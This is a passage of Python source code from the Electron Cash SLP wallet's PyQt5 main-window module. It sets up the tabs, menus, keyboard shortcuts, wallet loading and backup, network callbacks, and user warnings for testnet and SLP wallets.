# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import re
import sys, time, threading
import os, json, traceback
import shutil
import csv
from decimal import Decimal as PyDecimal # Qt 5.12 also exports Decimal
import base64
from functools import partial
from collections import OrderedDict
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
from electroncash import keystore, get_config
from electroncash.address import Address, ScriptOutput
from electroncash.bitcoin import COIN, TYPE_ADDRESS, TYPE_SCRIPT
from electroncash import networks
from electroncash.plugins import run_hook
from electroncash.i18n import _, ngettext, pgettext
from electroncash.util import (format_time, format_satoshis, PrintError,
format_satoshis_plain, format_satoshis_plain_nofloat,
NotEnoughFunds, NotEnoughFundsSlp, NotEnoughUnfrozenFundsSlp, ExcessiveFee,
UserCancelled, InvalidPassword, bh2u, bfh,
format_fee_satoshis, Weak, print_error)
import electroncash.web as web
from electroncash import Transaction
from electroncash import util, bitcoin, commands
from electroncash import paymentrequest
from electroncash.wallet import Multisig_Wallet, sweep_preparations
try:
from electroncash.plot import plot_history
except:
plot_history = None
import electroncash.web as web
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, BTCkBEdit, BTCSatsByteEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .popup_widget import ShowPopupLabel, KillPopupLabel, PopupWidget
from .util import *
import electroncash.slp as slp
from electroncash.slp_coinchooser import SlpCoinChooser
from electroncash.slp_checker import SlpTransactionChecker
from .amountedit import SLPAmountEdit
from electroncash.util import format_satoshis_nofloat
from .slp_create_token_genesis_dialog import SlpCreateTokenGenesisDialog
from .bfp_download_file_dialog import BfpDownloadFileDialog
from .bfp_upload_file_dialog import BitcoinFilesUploadDialog
try:
# pre-load QtMultimedia at app start, if possible
# this is because lazy-loading it from within Python
# callbacks led to crashes on Linux, likely due to
# bugs in PyQt5 (crashes wouldn't happen when testing
# with PySide2!).
from PyQt5.QtMultimedia import QCameraInfo
del QCameraInfo # defensive programming: not always available so don't keep name around
except ImportError as e:
pass # we tried to pre-load it, failure is ok; camera just won't be available
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(Qt.PointingHandCursor)
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
from electroncash.paymentrequest import PR_PAID
class ElectrumWindow(QMainWindow, MessageBoxMixin, PrintError):
# Note: self.clean_up_connections automatically detects signals named XXX_signal and disconnects them on window close.
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
new_fx_quotes_signal = pyqtSignal()
new_fx_history_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
alias_received_signal = pyqtSignal()
cashaddr_toggled_signal = pyqtSignal()
slp_validity_signal = pyqtSignal(object, object)
history_updated_signal = pyqtSignal()
labels_updated_signal = pyqtSignal() # note this signal occurs when an explicit update_labels() call happens. Interested GUIs should also listen for history_updated_signal, which likewise indicates labels may have changed.
on_timer_signal = pyqtSignal() # functions wanting to be executed from timer_actions should connect to this signal, preferably via Qt.DirectConnection
status_icon_dict = dict() # app-global cache of "status_*" -> QIcon instances (for update_status() speedup)
def __init__(self, gui_object, wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.wallet = wallet
self.config = config = gui_object.config
self.non_slp_wallet_warning_shown = False
self.force_use_single_change_addr = _('Change addresses behavior is not customizable for SLP wallets') if self.is_slp_wallet else False
if self.force_use_single_change_addr and not self.wallet.use_change:
self.wallet.use_change = True
self.wallet.storage.put('use_change', self.wallet.use_change)
self.network = gui_object.daemon.network
self.fx = gui_object.daemon.fx
self.invoices = wallet.invoices
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.not_enough_funds_slp = False
self.not_enough_unfrozen_funds_slp = False
self.op_return_toolong = False
self.internalpluginsdialog = None
self.externalpluginsdialog = None
self.hardwarewalletdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
self._tx_dialogs = Weak.Set()
self._slp_dialogs = Weak.Set()
self.tx_update_mgr = TxUpdateMgr(self) # manages network callbacks for 'new_transaction' and 'verified2', and collates GUI updates from said callbacks as a performance optimization
self.is_schnorr_enabled = self.wallet.is_schnorr_enabled # This is a function -- Support for plugins that may be using the 4.0.3 & 4.0.4 API -- this function used to live in this class, before being moved to Abstract_Wallet.
self.send_tab_opreturn_widgets, self.receive_tab_opreturn_widgets = [], [] # defaults to empty list
self._shortcuts = Weak.Set() # keep track of shortcuts and disable them on close
self.create_status_bar()
self.need_update = threading.Event()
self.labels_need_update = threading.Event()
self.decimal_point = config.get('decimal_point', 8)
self.fee_unit = config.get('fee_unit', 0)
self.num_zeros = int(config.get('num_zeros',0))
self.completions = QStringListModel()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.slp_mgt_tab = self.create_slp_mgt_tab()
self.converter_tab = self.create_converter_tab()
self.slp_history_tab = self.create_slp_history_tab()
self.slp_token_id = None
tabs.addTab(self.create_history_tab(), QIcon(":icons/tab_history.png"), _('History'))
tabs.addTab(self.send_tab, QIcon(":icons/tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, QIcon(":icons/tab_receive.png"), _('Receive'))
# clears/inits the opreturn widgets
self.on_toggled_opreturn(bool(self.config.get('enable_opreturn')))
def add_optional_tab(tabs, tab, icon, description, name, default=False):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), default):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, QIcon(":icons/tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.utxo_tab, QIcon(":icons/tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, QIcon(":icons/tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.converter_tab, QIcon(":icons/tab_converter.svg"), _("Address Converter"), "converter", True)
add_optional_tab(tabs, self.console_tab, QIcon(":icons/tab_console.png"), _("Con&sole"), "console")
if self.is_slp_wallet:
add_optional_tab(tabs, self.slp_mgt_tab, QIcon(":icons/tab_slp_icon.png"), _("Tokens"), "tokens")
add_optional_tab(tabs, self.slp_history_tab, QIcon(":icons/tab_slp_icon.png"), _("SLP History"), "slp_history", True)
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.init_menubar()
wrtabs = Weak.ref(tabs) # We use a weak reference here to help along python gc of QShortcut children: prevent the lambdas below from holding a strong ref to self.
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+W"), self, self.close) )
# Below is now added to the menu as Ctrl+R but we'll also support F5 like browsers do
self._shortcuts.add( QShortcut(QKeySequence("F5"), self, self.update_wallet) )
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs() and wrtabs().setCurrentIndex((wrtabs().currentIndex() - 1)%wrtabs().count())) )
self._shortcuts.add( QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs() and wrtabs().setCurrentIndex((wrtabs().currentIndex() + 1)%wrtabs().count())) )
for i in range(tabs.count()):
self._shortcuts.add( QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs() and wrtabs().setCurrentIndex(i)) )
self.cashaddr_toggled_signal.connect(self.update_cashaddr_icon)
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.gui_object.update_available_signal.connect(self.on_update_available) # shows/hides the update_available_button, emitted by update check mechanism when a new version is available
self.history_list.setFocus(True)
self.slp_history_list.setFocus(True)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet()
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['blockchain_updated', 'wallet_updated',
'new_transaction', 'status', 'banner', 'verified2',
'fee']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
self.network.register_callback(self.on_quotes, ['on_quotes'])
self.network.register_callback(self.on_history, ['on_history'])
self.new_fx_quotes_signal.connect(self.on_fx_quotes)
self.new_fx_history_signal.connect(self.on_fx_history)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
@property
def is_slp_wallet(self):
return self.wallet.is_slp
_first_shown = True
def showEvent(self, event):
super().showEvent(event)
if event.isAccepted() and self._first_shown:
self._first_shown = False
weakSelf = Weak.ref(self)
# do this immediately after this event handler finishes -- noop on everything but linux
QTimer.singleShot(0, lambda: weakSelf() and weakSelf().gui_object.lin_win_maybe_show_highdpi_caveat_msg(weakSelf()))
def update_token_type_combo(self):
self.token_type_combo.clear()
self.receive_token_type_combo.clear()
self.token_type_combo.addItem(QIcon(':icons/tab_coins.png'), 'None', None)
self.receive_token_type_combo.addItem(QIcon(':icons/tab_coins.png'), 'None', None)
try:
token_types = self.wallet.token_types
except AttributeError:
pass
else:
sorted_items = sorted(token_types.items(), key=lambda x:x[1]['name'])
for token_id, i in sorted_items:
if i['decimals'] != '?':
self.token_type_combo.addItem(QIcon(':icons/tab_slp_icon.png'),i['name'], token_id)
self.receive_token_type_combo.addItem(QIcon(':icons/tab_slp_icon.png'),i['name'], token_id)
def on_history(self, event, *args):
# NB: event should always be 'on_history'
if not args or args[0] is self.wallet:
self.new_fx_history_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_history(self):
if self.cleaned_up: return
self.history_list.refresh_headers()
self.history_list.update()
self.address_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def on_quotes(self, b):
self.new_fx_quotes_signal.emit()
@rate_limited(3.0) # Rate limit to no more than once every 3 seconds
def on_fx_quotes(self):
if self.cleaned_up: return
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_list.update()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
def toggle_tab(self, tab, forceStatus = 0):
# forceStatus = 0 , do nothing
# forceStatus = 1 , force Show
# forceStatus = 2 , force hide
if forceStatus==1:
show=True
elif forceStatus==2:
show=False
else:
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_format = _("Hide {tab_description}") if show else _("Show {tab_description}")
item_text = item_format.format(tab_description=tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
return self.top_level_window_recurse(override)
def diagnostic_name(self):
return "%s/%s" % (PrintError.diagnostic_name(self), self.wallet.basename())
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
try:
traceback.print_exception(*exc_info)
except OSError:
# Issue #662, user got IO error.
# We want them to still get the error displayed to them.
pass
self.show_error(str(exc_info[1]))
def on_network(self, event, *args):
#self.print_error("on_network:", event, *args)
if event == 'wallet_updated':
if args[0] is self.wallet:
self.need_update.set()
elif event == 'blockchain_updated':
self.need_update.set()
elif event == 'new_transaction':
self.tx_update_mgr.notif_add(args) # added only if this wallet's tx
if args[1] is self.wallet:
self.network_signal.emit(event, args)
elif event == 'verified2':
self.tx_update_mgr.verif_add(args) # added only if this wallet's tx
elif event in ['status', 'banner', 'fee']:
# Handle in GUI thread
self.network_signal.emit(event, args)
else:
self.print_error("unexpected network message:", event, args)
def on_network_qt(self, event, args=None):
if self.cleaned_up: return
# Handle a network message in the GUI thread
if event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'fee':
pass
elif event == 'new_transaction':
self.check_and_reset_receive_address_if_needed()
else:
self.print_error("unexpected network_qt signal:", event, args)
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def _close_wallet(self):
if self.wallet:
self.print_error('close_wallet', self.wallet.storage.path)
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
def load_wallet(self):
self.wallet.thread = TaskThread(self, self.on_error, name = self.wallet.diagnostic_name() + '/Wallet')
self.wallet.ui_emit_validity_updated = self.slp_validity_signal.emit
self.update_recently_visited(self.wallet.storage.path)
# address used to create a dummy transaction and estimate transaction fee
self.history_list.update()
self.address_list.update()
self.utxo_list.update()
self.need_update.set()
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
if self.is_slp_wallet:
self.slp_history_list.update()
self.token_list.update()
self.update_token_type_combo()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.tray.isVisible():
self.hide()
else:
self.show()
if self._is_invalid_testnet_wallet():
self.gui_object.daemon.stop_wallet(self.wallet.storage.path)
self._rebuild_history_action.setEnabled(False)
self._warn_if_invalid_testnet_wallet()
self.watching_only_changed()
self.history_updated_signal.emit() # inform things like address_dialog that there's a new history
if self.is_slp_wallet:
self.toggle_cashaddr(2, True)
self.toggle_tab(self.slp_mgt_tab, 1)
self.toggle_tab(self.slp_history_tab, 1)
else:
self.toggle_cashaddr(1, True)
self.update_receive_address_widget()
self.address_list.update()
self.utxo_list.update()
self.slp_mgt_tab.update()
self.slp_history_tab.update()
self.update_cashaddr_icon()
run_hook('load_wallet', self.wallet, self)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.print_error("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
title = '%s %s - %s' % (networks.net.TITLE,
self.wallet.electrum_version,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
self.warn_if_watching_only()
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.can_change_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoin Cash with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoin Cash to be sent to this wallet.")
])
self.show_warning(msg, title=_('Information'))
def _is_invalid_testnet_wallet(self):
if not networks.net.TESTNET:
return False
is_old_bad = False
xkey = ((hasattr(self.wallet, 'get_master_public_key') and self.wallet.get_master_public_key())
or None)
if xkey:
from electroncash.bitcoin import deserialize_xpub, InvalidXKeyFormat
try:
xp = deserialize_xpub(xkey)
except InvalidXKeyFormat:
is_old_bad = True
return is_old_bad
def _warn_if_invalid_testnet_wallet(self):
''' This was added after the upgrade from the bad xpub testnet wallets
to the good tpub testnet wallet format in version 3.3.6. See #1164.
We warn users if they are using the bad wallet format and instruct
them on how to upgrade their wallets.'''
is_old_bad = self._is_invalid_testnet_wallet()
if is_old_bad:
msg = ' '.join([
_("This testnet wallet has an invalid master key format."),
_("(Old versions of Electron Cash before 3.3.6 produced invalid testnet wallets)."),
'<br><br>',
_("In order to use this wallet without errors with this version of EC, please <b>re-generate this wallet from seed</b>."),
"<br><br><em><i>~SPV stopped~</i></em>"
])
self.show_critical(msg, title=_('Invalid Master Key'), rich_text=True)
return is_old_bad
def _warn_slp_prefers_slp_wallets_if_not_slp_wallet(self):
if not self.is_slp_wallet and not self.non_slp_wallet_warning_shown:
msg = '\n\n'.join([
_("WARNING: SLP Tokens Disabled."),
_("SLP tokens were detected in this older style wallet file and this version does not allow use of SLP tokens for your protection."),
_("Please install version 3.4.6 to create a new SLP wallet file and then transfer the tokens from this wallet file to the new 3.4.6 style wallet file."),
_("Why? This is because Electron Cash SLP versions 3.4.3 and later all include a significant security improvement for SLP tokens. That is, all standard wallet files created with 3.4.3 and later use BIP-44 key derivation path m/44'/245' to reduce the risk of burning SLP tokens. Taking no action could result in burning your tokens if this wallet's seed is imported into a non-SLP aware wallet."),
_('''If you're wondering "what do I have to do?":'''),
_("If you want to recover the SLP tokens in this wallet file you need to install version 3.4.6 of this software and follow the instructions provided above.")
])
self.show_warning(msg, title=_("SLP Tokens Detected in a Non-SLP Wallet"))
self.non_slp_wallet_warning_shown = True
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
if not os.path.exists(wallet_folder):
wallet_folder = None
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
if filename.lower().endswith('.txn'):
# they did File -> Open on a .txn, just do that.
self.do_process_from_file(fileName=filename)
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
# Copy file contents
shutil.copyfile(path, new_path)
# Copy file attributes if possible
# (not supported on targets like Flatpak documents)
try:
shutil.copystat(path, new_path)
except (IOError, os.error):
pass
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except (IOError, os.error) as reason:
self.show_critical(_("Electron Cash was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent2 = []
for k in recent:
if os.path.exists(k):
recent2.append(k)
recent = recent2[:5]
self.config.set_key('recently_open', recent)
self.recently_visited_menu.clear()
gui_object = self.gui_object
for i, k in enumerate(sorted(recent)):
b = os.path.basename(k)
def loader(k):
return lambda: gui_object.new_window(k)
self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1)))
self.recently_visited_menu.setEnabled(len(recent))
def get_wallet_folder(self):
return self.gui_object.get_wallet_folder()
def new_wallet(self):
try:
full_path = self.gui_object.get_new_wallet_path()
except FileNotFoundError as e:
self.show_error(str(e))
return
self.gui_object.start_new_window(full_path, None)
def init_menubar(self):
menubar = self.menuBar()
menubar.setObjectName(self.diagnostic_name() + ".QMenuBar")
destroyed_print_error(menubar)
file_menu = menubar.addMenu(_("&File"))
self.recently_visited_menu = file_menu.addMenu(_("Open &Recent"))
file_menu.addAction(_("&Open") + "...", self.open_wallet).setShortcut(QKeySequence.Open)
file_menu.addAction(_("&New/Restore") + "...", self.new_wallet).setShortcut(QKeySequence.New)
file_menu.addAction(_("&Save Copy As") + "...", self.backup_wallet).setShortcut(QKeySequence.SaveAs)
file_menu.addAction(_("&Delete") + "...", self.remove_wallet)
file_menu.addSeparator()
file_menu.addAction(_("&Quit"), self.close).setShortcut(QKeySequence.Quit)
wallet_menu = menubar.addMenu(_("&Wallet"))
wallet_menu.addAction(_("&Information"), self.show_master_public_keys, QKeySequence("Ctrl+I"))
wallet_menu.addSeparator()
self.password_menu = wallet_menu.addAction(_("&Password") + "...", self.change_password_dialog)
self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog)
self.private_keys_menu = wallet_menu.addMenu(_("Private Keys"))
self.private_keys_menu.addAction(_("&Sweep") + "...", self.sweep_key_dialog).setDisabled(True) # always disable in SLP for now
self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import") + "...", self.do_import_privkey)
self.export_menu = self.private_keys_menu.addMenu(_("&Export"))
self.export_menu.addAction(_("&WIF Plaintext") + "...", self.export_privkeys_dialog)
self.export_menu.addAction(_("&BIP38 Encrypted") + "...", self.export_bip38_dialog)
self.import_address_menu = wallet_menu.addAction(_("Import addresses") + "...", self.import_addresses)
wallet_menu.addSeparator()
self._rebuild_history_action = wallet_menu.addAction(_("&Rebuild History") + "...", self.rebuild_history)
self._scan_beyond_gap_action = wallet_menu.addAction(_("Scan &More Addresses..."), self.scan_beyond_gap)
self._scan_beyond_gap_action.setEnabled(bool(self.wallet.is_deterministic() and self.network))
wallet_menu.addSeparator()
labels_menu = wallet_menu.addMenu(_("&Labels"))
labels_menu.addAction(_("&Import") + "...", self.do_import_labels)
labels_menu.addAction(_("&Export") + "...", self.do_export_labels)
contacts_menu = wallet_menu.addMenu(_("&Contacts"))
contacts_menu.addAction(_("&New") + "...", self.new_contact_dialog)
contacts_menu.addAction(_("Import") + "...", lambda: self.contact_list.import_contacts())
contacts_menu.addAction(_("Export") + "...", lambda: self.contact_list.export_contacts())
invoices_menu = wallet_menu.addMenu(_("Invoices"))
invoices_menu.addAction(_("Import") + "...", lambda: self.invoice_list.import_invoices())
hist_menu = wallet_menu.addMenu(_("&History"))
#hist_menu.addAction(_("Plot"), self.plot_history_dialog).setEnabled(plot_history is not None)
hist_menu.addAction(_("Export") + "...", self.export_history_dialog)
wallet_menu.addSeparator()
wallet_menu.addAction(_("&Find"), self.toggle_search, QKeySequence("Ctrl+F"))
wallet_menu.addAction(_("Refresh GUI"), self.update_wallet, QKeySequence("Ctrl+R"))
def add_toggle_action(view_menu, tab):
is_shown = self.tabs.indexOf(tab) > -1
item_format = _("Hide {tab_description}") if is_shown else _("Show {tab_description}")
item_name = item_format.format(tab_description=tab.tab_description)
tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab))
view_menu = menubar.addMenu(_("&View"))
add_toggle_action(view_menu, self.addresses_tab)
add_toggle_action(view_menu, self.utxo_tab)
add_toggle_action(view_menu, self.contacts_tab)
add_toggle_action(view_menu, self.converter_tab)
add_toggle_action(view_menu, self.console_tab)
if self.is_slp_wallet:
add_toggle_action(view_menu, self.slp_mgt_tab)
add_toggle_action(view_menu, self.slp_history_tab)
tools_menu = menubar.addMenu(_("&Tools"))
prefs_tit = _("Preferences") + "..."
a = tools_menu.addAction(prefs_tit, self.settings_dialog, QKeySequence("Ctrl+,") ) # Note: on macOS this hotkey sequence won't be shown in the menu (since it's reserved by the system), but will still work. :/
if sys.platform == 'darwin':
# This turns off the heuristic matching based on name and keeps the
# "Preferences" action out of the application menu and into the
# actual menu we specified on macOS.
a.setMenuRole(QAction.NoRole)
gui_object = self.gui_object
weakSelf = Weak.ref(self)
tools_menu.addAction(_("&Network") + "...", lambda: gui_object.show_network_dialog(weakSelf()), QKeySequence("Ctrl+K"))
tools_menu.addAction(_("Optional &Features") + "...", self.internal_plugins_dialog, QKeySequence("Shift+Ctrl+P"))
tools_menu.addAction(_("Installed &Plugins") + "...", self.external_plugins_dialog, QKeySequence("Ctrl+P"))
if sys.platform in ('linux', 'linux2', 'linux3'):
tools_menu.addSeparator()
tools_menu.addAction(_("&Hardware Wallet Support..."), self.hardware_wallet_support)
tools_menu.addSeparator()
tools_menu.addAction(_("&Sign/Verify Message") + "...", self.sign_verify_message)
tools_menu.addAction(_("&Encrypt/Decrypt Message") + "...", self.encrypt_message)
tools_menu.addSeparator()
tools_menu.addAction(_("Upload a file using BFP"), lambda: BitcoinFilesUploadDialog(self, None, True, "Upload a File Using BFP"))
tools_menu.addAction(_("Download a file using BFP"), lambda: BfpDownloadFileDialog(self,))
tools_menu.addSeparator()
paytomany_menu = tools_menu.addAction(_("&Pay to Many"), self.paytomany, QKeySequence("Ctrl+M"))
raw_transaction_menu = tools_menu.addMenu(_("&Load Transaction"))
raw_transaction_menu.addAction(_("From &File") + "...", self.do_process_from_file)
raw_transaction_menu.addAction(_("From &Text") + "...", self.do_process_from_text, QKeySequence("Ctrl+T"))
raw_transaction_menu.addAction(_("From the &Blockchain") + "...", self.do_process_from_txid, QKeySequence("Ctrl+B"))
raw_transaction_menu.addAction(_("From &QR Code") + "...", self.read_tx_from_qrcode)
self.raw_transaction_menu = raw_transaction_menu
run_hook('init_menubar_tools', self, tools_menu)
help_menu = menubar.addMenu(_("&Help"))
help_menu.addAction(_("&About"), self.show_about)
help_menu.addAction(_("About Qt"), self.app.aboutQt)
help_menu.addAction(_("&Check for Updates"), lambda: self.gui_object.show_update_checker(self))
help_menu.addAction(_("&Official Website"), lambda: webopen("https://electroncash.org"))
help_menu.addSeparator()
help_menu.addAction(_("Documentation"), lambda: webopen("http://electroncash.readthedocs.io/")).setShortcut(QKeySequence.HelpContents)
help_menu.addAction(_("&Report Bug..."), self.show_report_bug)
help_menu.addSeparator()
help_menu.addAction(_("&Donate to Server") + "...", self.donate_to_server)
def donate_to_server(self):
d = self.network.get_donation_address()
if d:
host = self.network.get_parameters()[0]
# The message is intentionally untranslated, leave it like that
self.pay_to_URI('{}:{}?message=donation for {}'
.format(networks.net.CASHADDR_PREFIX, d, host))
else:
self.show_error(_('No donation address for this server'))
def show_about(self):
QMessageBox.about(self, "Electron Cash SLP",
"<p><font size=+3><b>Electron Cash SLP</b></font></p><p>" + _("Version") + f" {self.wallet.electrum_version}" + "</p>" +
'<p><span style="font-size:11pt; font-weight:500;">' + "Copyright © 2017-2019<br>Electron Cash LLC & The Electron Cash Developers" + "</span></p>" +
'<p><span style="font-weight:200;">' +
_("Electron Cash's focus is speed, with low resource usage and simplifying Bitcoin Cash. You do not need to perform regular backups, because your wallet can be recovered from a secret phrase that you can memorize or write on paper. Startup times are instant because it operates in conjunction with high-performance servers that handle the most complicated parts of the Bitcoin Cash system.") +
"</span></p>"
)
def show_report_bug(self):
msg = ' '.join([
_("Please report any bugs as issues on github:<br/>"),
"<a href=https://github.com/simpleledger/Electron-Cash-SLP/issues>https://github.com/simpleledger/Electron-Cash-SLP/issues</a><br/><br/>",
_("Before reporting a bug, upgrade to the most recent version of Electron Cash (latest release or git HEAD), and include the version number in your report."),
_("Try to explain not only what the bug is, but how it occurs.")
])
self.show_message(msg, title="Electron Cash - " + _("Reporting Bugs"), rich_text = True)
def notify(self, message):
self.gui_object.notify(message)
# custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user
def getOpenFileName(self, title, filter = ""):
return __class__.static_getOpenFileName(title=title, filter=filter, config=self.config, parent=self)
def getSaveFileName(self, title, filename, filter = ""):
return __class__.static_getSaveFileName(title=title, filename=filename, filter=filter, config=self.config, parent=self)
@staticmethod
def static_getOpenFileName(*, title, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
fileName, __ = QFileDialog.getOpenFileName(parent, title, directory, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
@staticmethod
def static_getSaveFileName(*, title, filename, parent=None, config=None, filter=""):
if not config:
config = get_config()
userdir = os.path.expanduser('~')
directory = config.get('io_dir', userdir) if config else userdir
path = os.path.join( directory, filename )
fileName, __ = QFileDialog.getSaveFileName(parent, title, path, filter)
if fileName and directory != os.path.dirname(fileName) and config:
config.set_key('io_dir', os.path.dirname(fileName), True)
return fileName
def timer_actions(self):
# Note this runs in the GUI thread
if self.need_update.is_set():
self._update_wallet() # will clear flag when it runs. (also clears labels_need_update as well)
if self.labels_need_update.is_set():
self._update_labels() # will clear flag when it runs.
# resolve aliases
# FIXME this is a blocking network call that has a timeout of 5 sec
self.payto_e.resolve()
# update fee
if self.require_fee_update:
self.do_update_fee()
self.require_fee_update = False
# hook for other classes to be called here. For example the tx_update_mgr is called here (see TxUpdateMgr.do_check).
self.on_timer_signal.emit()
def format_amount(self, x, is_diff=False, whitespaces=False):
return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces)
def format_amount_and_units(self, amount, is_diff=False):
text = self.format_amount(amount, is_diff=is_diff) + ' '+ self.base_unit()
x = self.fx.format_amount_and_units(amount, is_diff=is_diff)
if text and x:
